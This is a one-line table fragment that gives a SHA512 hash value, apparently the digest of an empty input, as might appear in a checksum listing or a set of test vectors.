| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |